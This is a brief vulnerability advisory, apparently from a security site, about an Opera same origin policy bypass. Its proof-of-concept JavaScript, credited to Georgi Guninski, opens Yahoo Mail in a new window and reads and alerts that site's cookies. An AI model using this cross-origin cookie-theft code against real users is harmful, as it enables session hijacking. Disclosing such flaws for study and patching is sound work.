|
Opera Same Origin Policy Circumvention Vulnerability
The following example was provided by Georgi Guninski: -1.---------------------------------- a=window.open("http://mail.yahoo.com"); function f() { xx=a.document.cookie; alert("hi"+xx); a.document.open(); a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>"); a.document.close(); } setTimeout("f()",5000); ----------------------------------- |
|
Privacy Statement |